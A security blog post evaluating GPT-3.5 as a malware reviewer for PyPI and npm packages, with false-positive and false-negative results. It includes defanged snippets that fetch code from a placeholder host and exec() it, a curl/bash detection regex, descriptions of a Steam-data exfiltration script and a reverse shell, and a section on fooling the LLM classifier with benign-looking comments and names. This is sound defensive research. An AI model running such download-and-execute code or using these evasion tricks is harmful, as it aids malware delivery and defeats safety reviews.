LLM-assisted Malware Review: AI and Humans Join Forces to Combat Malware

Henrik Plate

TL;DR - Experiments with GPT-3.5 suggest that LLM-based malware reviews can complement, but not yet substitute for, human reviews. 1800 binary classifications performed with GPT-3.5 included both false-positives and false-negatives. Moreover, it turned out that the classification can be fooled with simple tricks. However, pre-processing of code snippets, additional effort on prompt engineering, and future models are expected to improve these results.

The number of malicious packages published on PyPI, npm and other package repositories keeps on increasing, and we do not think this phenomenon is going to disappear any time soon: The creation of fake accounts and the publication of malicious packages can be automated to a great extent such that the marginal costs of creating and releasing a malicious package come close to zero.

A few months back, we at Endor Labs joined the community’s efforts to identify malicious packages. To this end, we employ a mixture of different AI techniques that look at features of the packages’ source code and metadata. The source code, for example, is searched for the presence of typical malware behavior, e.g., droppers, reverse shells or information exfiltration.

As with every other classification task, it is desirable to minimize both the number of false-positives (packages wrongly classified as malicious) and false-negatives (packages wrongly classified as benign). However, minimizing one often comes at the expense of increasing the other, which requires finding the right balance for the specific use-case at hand. Common questions in this context concern the security risks implied by false-negatives on one side, and the availability of resources (and their willingness) to deal with false-positives on the other.

And this is where large language models (LLMs) such as GPT-3.5 or GPT-4 come into the picture: They are not only able to generate source code in a large variety of programming languages, including various kinds of malware, but also show impressive results when it comes to explaining source code. Could their capability to automatically assess large numbers of malware candidates permit the use of noisier detection techniques, thereby increasing recall?

In the following example, ChatGPT is able to decode a naïvely obfuscated URL and correctly summarizes the snippet’s behavior as potentially malicious.
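The original screenshot is not reproduced here, but a snippet of the kind shown to ChatGPT could look as follows. This is a hypothetical, defanged stand-in (malicious.example is a placeholder URL): the download target is stored base64-encoded so that a plain-text search will not find it.

```python
import base64

# Hypothetical example of naive obfuscation: the URL is kept
# base64-encoded so that a simple string search cannot spot it.
ENCODED = base64.b64encode(b"http://malicious.example/payload.sh").decode()

def resolve_target() -> str:
    # Decoding at runtime reveals the actual download target.
    return base64.b64decode(ENCODED).decode()

print(resolve_target())  # http://malicious.example/payload.sh
```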

Encouraged by such examples, we decided to evaluate whether and how to include an LLM-assisted review step in our malware analysis pipeline, and this blog post reports on those experiments.

Experimental setup

The experimental pipeline monitors PyPI and npm. For every newly published artifact, it starts collecting dozens of signals from the respective source code, e.g., the presence of suspicious string literals or the use and combination of certain APIs. The collection of those signals is based on the review of malware samples used in past attacks, such as the ones contained in the Backstabber’s Knife Collection.
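A minimal sketch of one such signal is shown below, assuming a simple AST walk over Python sources (the production detectors are not public, and the marker list is purely illustrative): flag suspicious string literals anywhere in a file.

```python
import ast

# Illustrative markers only -- not the actual rule set of the pipeline.
SUSPICIOUS_MARKERS = ("b64decode", "/etc/passwd", "ssh/id_rsa")

def string_literal_signals(source: str) -> list:
    """Collect string literals that contain a suspicious marker."""
    hits = []
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Constant) and isinstance(node.value, str):
            if any(marker in node.value for marker in SUSPICIOUS_MARKERS):
                hits.append(node.value)
    return hits

print(string_literal_signals('path = "/etc/passwd"'))  # ['/etc/passwd']
```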

In the case of npm, every newly published package comes with exactly one artifact, while PyPI packages can have multiple source and binary artifacts, e.g., wheels and source tarballs, each of which is analyzed separately.

Note that we decided to re-include signals in the pipeline that were considered too noisy in the past, i.e., which produced too many false-positives. A good example of such a noisy signal is the start of operating system processes with string literals that contain sensitive commands such as “curl” or “bash”: While such calls have been used numerous times to download and execute 2nd-stage malware, they are also commonly used for non-malicious tasks.
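This noisy signal could be sketched as follows, assuming a crude regex-based check (a hypothetical reconstruction, not the production rule): it fires whenever a process-spawning API and a sensitive command co-occur in the same file, which makes it deliberately high-recall and low-precision.

```python
import re

# Process-spawning APIs and sensitive commands, matched independently.
PROCESS_CALL = re.compile(r"(?:os\.system|subprocess\.(?:run|Popen|call))\s*\(")
SENSITIVE_CMD = re.compile(r"\b(?:curl|bash)\b")

def noisy_process_signal(source: str) -> bool:
    # Fires on co-occurrence anywhere in the file -- intentionally noisy.
    return bool(PROCESS_CALL.search(source)) and bool(SENSITIVE_CMD.search(source))

print(noisy_process_signal('os.system("curl http://x | bash")'))  # True
print(noisy_process_signal('subprocess.run(["ls", "-l"])'))       # False
```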

Finally, rather than using homegrown models to predict maliciousness, the pipeline’s last step makes a call to api.openai.com and asks for a binary classification of each code snippet collected beforehand, until either no code snippets remain for a given artifact or the artifact has been classified as malicious. To this end, we use the model gpt-3.5-turbo with default temperature.
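This last step could be sketched as follows, using the plain HTTP interface of api.openai.com; note that the prompt wording below is a simplified reconstruction for illustration, not the exact prompt used in the pipeline.

```python
import json
import urllib.request

# Simplified reconstruction of the classification prompt (assumption).
SYSTEM_PROMPT = (
    "You are a security analyst. Classify the following code snippet "
    "strictly as MALICIOUS or BENIGN, then explain your reasoning."
)

def build_payload(snippet: str) -> dict:
    return {
        "model": "gpt-3.5-turbo",  # default temperature, as in the experiment
        "messages": [
            {"role": "system", "content": SYSTEM_PROMPT},
            {"role": "user", "content": snippet},
        ],
    }

def parse_verdict(answer: str) -> bool:
    # True means the snippet was classified as malicious.
    return answer.strip().upper().startswith("MALICIOUS")

def classify(snippet: str, api_key: str) -> bool:
    request = urllib.request.Request(
        "https://api.openai.com/v1/chat/completions",
        data=json.dumps(build_payload(snippet)).encode(),
        headers={
            "Authorization": f"Bearer {api_key}",
            "Content-Type": "application/json",
        },
    )
    with urllib.request.urlopen(request) as response:
        body = json.load(response)
    return parse_verdict(body["choices"][0]["message"]["content"])
```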

Preliminary Results

Over a period of several days, GPT-3.5 was queried for 1874 artifacts; the code snippets of 34 artifacts (from 29 distinct packages) were classified as malicious.

  • 13 of those artifacts (from 9 distinct packages) were true-positive findings, thus, contained malware. Artifacts of the following 5 packages were still present in the respective registry at the time of our manual review. We informed the registry administrators accordingly, who removed them within a few hours after our report:
      • Promptcolor 0.1.0 (PyPI)
      • Libcrypt 1.2.0 (PyPI)
      • Colorizepip 1.0.0 (PyPI)
      • Readycharz 0.2.0 (PyPI)
      • Bleeding-edge-css 1.2.2 and 2.2.2 (npm)
  • 1 artifact is a proof-of-concept that downloads and opens an image via an npm install hook.
  • 5 other artifacts (from 4 distinct packages) contain obfuscated code, which, according to our analysis, did not expose any malicious behavior.
  • 15 artifacts (from 14 distinct packages) were false-positive findings, thus, wrongly classified by GPT-3.5 as malicious.

Considering that obfuscated code in packages distributed on npm and PyPI often goes hand in hand with malicious behavior, and thus warrants a deeper review, we lean towards saying that GPT-3.5 correctly assessed 19 of the 34 artifacts.

The false-positives are predominantly due to incomplete and syntactically incorrect code snippets, which commonly result when the prompt’s length restriction prevents us from including an entire file.

In the case of the PyPI package “cikuu”, for example, GPT-3.5 concluded that the “code appears to be incomplete and stops abruptly in the middle of writing the code for the `save_ssi` function. As such, it will not execute properly and will not cause any harm. However, if the missing code contains any malicious intent, it cannot be determined without the complete source code. Therefore, it is strongly recommended to not use or execute this code until it can be verified that the entire code is safe and functional”.

With regard to false-negatives, it is interesting to highlight some examples found during spot checks.

The Python file steam.py of the malicious package web3toolz 0.8, for instance, exfiltrates information related to the Steam gaming platform. However, even though GPT-3.5 explains the behavior very well, it does not assess this behavior as malicious. 

“The given source code is not malicious. It imports some built-in Python libraries such as os, os.path, zipfile, and requests for file handling and web requests. It also imports the base64 library to decode the response from the web request. Firstly, it decodes the response from "https://mehmetaliii.pythonanywhere.com/webzuhurt" using base64.b64decode() and assigns it to the 'hook' variable. This decoded value represents a URL that is used to send a POST request later.

After that, the script checks the existence of the 'steam' directory in the Program Files directory. If it is present then it finds all files starting with \"ssfn\" along with the 'config' file from the steam directory. Then it writes all these files to a zipped file 'steam_session.zip' located in the temporary directory using the zipfile library. Finally, it sends a POST request to the URL at 'hook' with the 'steam_session.zip' file as a payload.

So, this script seems to prepare a file containing Steam configurations and SSFN files (used for Steam guard authentication) and sends it to a specific URL. The impact of the code execution depends on the hosted URL's intent and can not be determined by this script.”

Again, we reported this package and it has been promptly removed by the PyPI administrators.

Another example is the Python file python.payload.py of the pentesting tool PhoenixC2 1.0. Again, GPT-3.5 correctly describes a reverse shell and other suspicious behavior, however, it does not flag it as potentially malicious:

“The Python code in "python.payload.py" seems to be benign. It establishes a connection with the server and waits for commands from the server. Based on the received commands, it either executes system shell commands, sends/receives files to/from the server, starts reverse-shell or executes modules. None of these actions seem to be malicious in isolation.

However, the impact of the code execution depends on the commands received from the server. If any of the commands executed are malicious, then the impact of the code execution can be classified as malicious as well.”

Interestingly, GPT-4 comes to a different conclusion (with which we agree):

Simple tricks to evade detection

In addition to the experiment above, we also investigated the possibility of tricking GPT into wrong assessments.

And this is when the initial excitement about GPT-3.5 gave way to a more sober and realistic view of its current capabilities: As it turned out, GPT can be tricked, with the help of several simple techniques, into changing an assessment from malicious to benign, e.g., by using innocent function names, including comments that indicate benign functionality, or through the inclusion of string literals.

In this example, GPT-3.5 “believed” the comment and suggested that the code “seems to be benign since it only downloads additional code and executes it, but doesn't seem to contain any malicious functionality”.
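The trick can be illustrated with the following hypothetical pair of snippets (malicious.example is a placeholder): both download and exec() remote code, but the second is dressed up with an innocent function name and a reassuring comment. In our tests, this kind of wording was enough to flip the verdict.

```python
# Variant 1: the downloader pattern, undisguised.
PLAIN = '''import urllib.request
payload = urllib.request.urlopen("http://malicious.example/x").read()
exec(payload)
'''

# Variant 2: identical behavior, wrapped in benign-sounding text.
DISGUISED = '''import urllib.request
# Load the optional telemetry helper shipped on our CDN.
plugin = urllib.request.urlopen("http://malicious.example/x").read()
exec(plugin)  # initialize the helper
'''

# Both variants are syntactically valid Python; only names and
# comments differ, not the executed behavior.
compile(PLAIN, "<plain>", "exec")
compile(DISGUISED, "<disguised>", "exec")
```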

But once you take a step back, this does not come as a big surprise: After all, LLMs have been trained on large corpora of text in order to predict characters, words and sentences based on probabilistic models. Intuitively, the addition of content suggesting benign behavior shifts the model’s estimate towards the code indeed doing something useful…

Also note that it was not easily possible to modify the initial instructions provided in the prompt such that GPT-3.5 ignores comments or function names when “interpreting” the source code snippet.

Going forward, it will be interesting to evaluate the effect of pre-processing source code snippets prior to being included in the prompt, e.g., to replace identifiers and remove comments altogether. This, however, will certainly impact the model’s capability to explain the source code, which is to a great extent based on interpreting program code as text and using human-provided identifiers and comments as input. Moreover, the use of generic identifiers could also be “interpreted” as obfuscation and as such negatively influence the assessment.
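A naive version of such a pre-processing step could look as follows, assuming Python snippets: drop all comments and map every identifier to a generic name before the snippet enters the prompt. Note that this sketch also renames builtins and module names, which is exactly the kind of semantics-destroying "obfuscation" that might itself bias the model.

```python
import io
import keyword
import tokenize

def sanitize(source: str) -> str:
    """Strip comments and replace identifiers with generic names."""
    mapping = {}
    out = []
    for tok in tokenize.generate_tokens(io.StringIO(source).readline):
        if tok.type == tokenize.COMMENT:
            continue  # comments carry attacker-controlled text
        if tok.type == tokenize.NAME and not keyword.iskeyword(tok.string):
            mapping.setdefault(tok.string, f"id_{len(mapping)}")
            out.append((tok.type, mapping[tok.string]))
        else:
            out.append((tok.type, tok.string))
    return tokenize.untokenize(out)

print(sanitize("secret_key = load()  # totally harmless\n"))
```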


Conclusion

The experiments described in this blog post suggest that LLM-assisted malware reviews with GPT-3.5 are not yet a viable alternative to manual reviews.

One inherent problem seems to be the reliance on identifiers and comments to “understand” code behavior. They are a valuable source of information for code developed by benign developers, but they can also be easily misused by adversaries to evade the detection of malicious behavior.

But even though LLM-based assessments should not be used instead of manual reviews, they can certainly be used as one additional signal and input for manual reviews. In particular, they can be useful to automatically review larger numbers of malware signals produced by noisy detectors (which otherwise risk being ignored entirely in the case of limited review capacity).